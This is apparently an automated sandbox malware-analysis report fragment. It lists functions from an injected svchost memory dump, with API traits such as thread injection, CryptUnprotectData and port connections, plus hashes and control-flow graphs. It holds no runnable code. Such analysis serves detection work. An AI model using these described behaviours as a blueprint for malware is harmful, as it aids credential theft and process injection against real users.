call 1c276405b00 * 3 259->260 261 1c27640741e-1c27640741f 259->261 275 1c276407499-1c2764074aa call 1c276401030 260->275 276 1c2764074af-1c2764074f4 260->276 263 1c276407422-1c276407428 261->263 265 1c276407442-1c27640744f 263->265 266 1c27640742a-1c27640742d 263->266 265->263 267 1c276407451-1c276407452 265->267 266->265 269 1c27640742f-1c276407432 266->269 267->260 269->265 271 1c276407434-1c27640743d call 1c276405b00 269->271 271->265 275->276 276->258
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Information$Token$FreeLibraryLoadProcessQueryVirtualfree
                                                                                                                                                                                                                                                                                                          • String ID: ,$,
                                                                                                                                                                                                                                                                                                          • API String ID: 1666771522-220654547
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4c387455b2af8135f36f68a1ca485273673d810924601f1bbfd7e8c304cd2754
                                                                                                                                                                                                                                                                                                          • Instruction ID: 32c062c0aafdf18a9341c18cd2d379bd24052863ef714cef3dd53f70b0defa5b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c387455b2af8135f36f68a1ca485273673d810924601f1bbfd7e8c304cd2754
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1926230658B188FE775EF68C895BEA77E1FBA4300F10466DD48AC3291DF74D8658B82
                                                                                                                                                                                                                                                                                                          Function 00007DF426ABF180 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPathPort$NameName_free
                                                                                                                                                                                                                                                                                                          • String ID: $0$@
                                                                                                                                                                                                                                                                                                          • API String ID: 1495449958-2347541974
                                                                                                                                                                                                                                                                                                          • Opcode ID: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                                                                                                                                                                                                          • Instruction ID: b8effeec94c7cc02a6a9605600e32779622b25da2130eefce8eee60c3644e4b7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2751923452C7888FD764DF18D8867AE77E4FB99710F14456EE48EC2241DB74E8858B83
                                                                                                                                                                                                                                                                                                          Function 00007DF426ABFEE8 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 241nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort$malloc
                                                                                                                                                                                                                                                                                                          • String ID: :$\$\
                                                                                                                                                                                                                                                                                                          • API String ID: 4075351004-4100998398
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8600be78817e26d540670b592af16947eec523b64369a194b9f4ed07e7a35fa9
                                                                                                                                                                                                                                                                                                          • Instruction ID: 389b719f37808e05746ca0b19760c6d34538c293ea5ea41a5a7b5835939818f4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8600be78817e26d540670b592af16947eec523b64369a194b9f4ed07e7a35fa9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D71603161CA898BE764EB18DC856ABB3E1FFD5314F00453AE48BC3191EE34E945C792
                                                                                                                                                                                                                                                                                                          Function 00007DF426AB0B80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFind$DirectoryFirstNextRemovecalloc
                                                                                                                                                                                                                                                                                                          • String ID: \
                                                                                                                                                                                                                                                                                                          • API String ID: 1149621650-2967466578
                                                                                                                                                                                                                                                                                                          • Opcode ID: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9a91e2a0c6a821b8a5a3ccf3d1564af426b0f7e6c27fe984edb6fcf2d6a8bb00
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1041A0316089888FDB45EF28DCC8ADA77B5FBA5711F140676D44BDB165DF38A844CB80
                                                                                                                                                                                                                                                                                                          Function 00007DF426AC0344 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 346threadnativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPortThread$CreateTerminatefree
                                                                                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                                                                                          • API String ID: 3804328794-336475711
                                                                                                                                                                                                                                                                                                          • Opcode ID: cab7ce814fbb199f42c137d0c150eb7037cae266d8c18edf1120dbd5f08e7314
                                                                                                                                                                                                                                                                                                          • Instruction ID: a7ae890baa2072f2de96901d67319a9e99f9850188a1f8006824c29e79fbdca1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cab7ce814fbb199f42c137d0c150eb7037cae266d8c18edf1120dbd5f08e7314
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0B18E3061CA898BE764AF18D8556ABB7E0FFD5314F00453EE48BC3291DA79E881CB52
                                                                                                                                                                                                                                                                                                          Function 00007DF426ABF32C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPortcalloc
                                                                                                                                                                                                                                                                                                          • String ID: $0$@
                                                                                                                                                                                                                                                                                                          • API String ID: 2195583734-2347541974
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                                                                                                                                                                                                          • Instruction ID: 12bdb3f96f3735e1f855be1f31f74d292a1831c225cafe85c4efd81063578082
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1251393060CB898FE764DF68D8547ABB7E5FBA9351F14093EE48EC2250DB78D4848B42
                                                                                                                                                                                                                                                                                                          Function 00007DF426AB08CC Relevance: 6.2, APIs: 4, Instructions: 232processCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$Create$CodeDesktopExitTerminate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3114477661-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                                                                                                                                                                                                          • Instruction ID: e34d3bc3d8118d7bfaa9dbfe7b6f6a3b926493810a2f0ba8a2a8390af1d193b4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC715E3061CB888FE7A4DF28D8997ABB7E5FB95311F00063EE48AC3191DF7894418B42
                                                                                                                                                                                                                                                                                                          Function 00007DF426AC0280 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID: 0$@
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-1545510068
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9a0d635755d8a24d93c63cab8bfbae9ae7092c3d51c1029aa018a74583f581cf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0a04a2a96608d6bdc8d203b45e31c2fb0fd85dc8aa6d7dbcc330663a9c59c5d8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a0d635755d8a24d93c63cab8bfbae9ae7092c3d51c1029aa018a74583f581cf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6114F70518B888FE350EB68C899B5BB7E4FF98354F500A2EE49AC3291DB78D544CB42
                                                                                                                                                                                                                                                                                                          Function 00007DF426AB59B0 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2502124517-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5e2fcdb0da9033e0b96ac5fedb13815d147d4e94b90461ca43ad420180aac7e8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66318F30608A488FE794EF28D8D879A77E5FB94320F50463BE45BC21D0DB38D885CB91
                                                                                                                                                                                                                                                                                                          Function 00007DF426A9286C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleSuspendThread
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1038686644-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 18a18994d6b9c143577c479e187b9b1791d484b370013957ecf7271e787155ff
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF91D631A1DA558BDB689F58DCC127A73E1FF5A320F24417AD08FC7586DA38E842CB85
                                                                                                                                                                                                                                                                                                          Function 00007DF426ACD42C Relevance: 1.8, APIs: 1, Instructions: 552COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                                                                                                                                                                                                          • Instruction ID: e3fedaae0658703adf4b48d329f3494bc333c44cad861ebf3e4e6ccc8e1663e9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C602513161CA888BEB65EB18D855A9BB3E1FF95310F50453EE44FC3192DE34E945CB82
                                                                                                                                                                                                                                                                                                          Function 00007DF426AB60F0 Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                                                                                                                                                                                                          • Instruction ID: ae806501c284ec1956d96b7f0c5678af417c7d98d03ed5a044222ab5e32484d2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC31AF3071CA488FE748EB6CD85966BB7E1FB99311F10453EF54AC3291DA38D8018792
                                                                                                                                                                                                                                                                                                          Function 000001C2764051BC Relevance: 1.6, APIs: 1, Instructions: 310COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 471 1c2764051bc-1c2764051f5 472 1c2764051f7-1c2764051ff 471->472 473 1c276405201-1c27640520a 471->473 472->473 474 1c276405216-1c27640521a 473->474 475 1c27640520c-1c276405214 473->475 476 1c276405226-1c27640523e 474->476 477 1c27640521c-1c276405224 474->477 475->474 478 1c27640524a-1c27640524d 476->478 479 1c276405240-1c276405248 476->479 477->476 480 1c276405259-1c27640525c 478->480 481 1c27640524f-1c276405257 478->481 479->478 482 1c276405268-1c276405276 480->482 483 1c27640525e-1c276405266 480->483 481->480 484 1c276405475 482->484 485 1c27640527c-1c276405296 call 1c276401030 482->485 483->482 487 1c276405477-1c276405487 484->487 485->484 489 1c27640529c-1c2764052a3 485->489 489->484 490 1c2764052a9-1c2764052ba malloc 489->490 490->484 491 1c2764052c0-1c2764052e1 call 1c2764050cc 490->491 493 1c2764052e6-1c2764052f8 491->493 495 1c27640546c-1c27640546d 493->495 496 1c2764052fe-1c27640532a call 1c2764098f4 493->496 495->484 499 1c27640532c-1c276405334 496->499 500 1c276405336-1c27640533d 499->500 501 1c27640533f-1c276405345 499->501 502 1c276405347-1c276405355 500->502 501->502 502->499 503 1c276405357-1c2764053c6 call 1c2764038c0 502->503 506 1c276405463-1c276405464 503->506 507 1c2764053cc-1c2764053d7 503->507 506->495 508 1c2764053d9-1c276405409 507->508 510 1c27640540b-1c276405417 508->510 510->508 511 1c276405419-1c276405420 510->511 512 1c276405422-1c276405423 511->512 513 1c27640545c-1c276405461 511->513 514 1c276405425-1c27640542c 512->514 513->487 515 1c27640542e-1c276405432 514->515 516 1c27640544f-1c27640545a 514->516 517 1c276405434-1c27640543e 515->517 516->513 516->514 518 1c276405445-1c27640544d 517->518 519 1c276405440 517->519 518->516 518->517 519->518
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b6ed53fab85cf22cf76427c2e966a0a197060846b061c1a52c71d60efdb2ca86
                                                                                                                                                                                                                                                                                                          • Instruction ID: 25f494acc884a9643d7420aa0927afbf57982972234888513f41771bc781ee57
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6ed53fab85cf22cf76427c2e966a0a197060846b061c1a52c71d60efdb2ca86
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C918931658A584BF73C9B28C8D1BF977D1F795305F14426EE4CBC2282EAB4D9178B81
                                                                                                                                                                                                                                                                                                          Function 000001C276405FA0 Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1778838933-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: aedaa32b066cd7baad790dc79b89f0f0aa25ff69fa0ea66035def9c6c87aec9e
                                                                                                                                                                                                                                                                                                          • Instruction ID: b36de423dc8bb3c6555e4d0e73f8fdfcd8d33dc2c32631ef5389decd234d95b0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aedaa32b066cd7baad790dc79b89f0f0aa25ff69fa0ea66035def9c6c87aec9e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41017130368B194FFB69EF7898A0EA673E4F7A5300F000969D45AC3191EF75C5218B41
                                                                                                                                                                                                                                                                                                          Function 00007DF426ABE25C Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                                                                                                                                                                                                          • Instruction ID: adb6f36af750dcc45d3b139404ac0752d9be016b136499a4783c6d61615261b7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0BD30A1CB858FDF64EB2CD489B59B7E1FBA9310F504559E84CC3245DA3498808B86
                                                                                                                                                                                                                                                                                                          Function 00007DF426ABE094 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 134aea25f81cf9f2ae6acf0a333d4125b05f09174743c67f116cb8741a524898
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5F06234A1C7C48FD7A0EB688585B9ABBF0BBAA354F54591EE8CCC3211D73594848B53
                                                                                                                                                                                                                                                                                                          Function 00007DF426ABE3E8 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7e945b9e9d3783d985f89a7c55f995a68936e66f455e10cacb894605b62bc272
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFE09B31618A448FDB04DF94CCC15AAF7F4FBD9350F004D7AE84BC7164D265D688C682
                                                                                                                                                                                                                                                                                                          Function 00007DF426ABE170 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 05e31f33c6856eba3b4b95167b54837f880b4cc5cf5dadf452710ba898c55d2b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDD05E34E28AC94BDA10A7289C407167BE1FBAA354FA44624D44DC3200E23CE48187C2
                                                                                                                                                                                                                                                                                                          Function 00007DF426ABE3C8 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
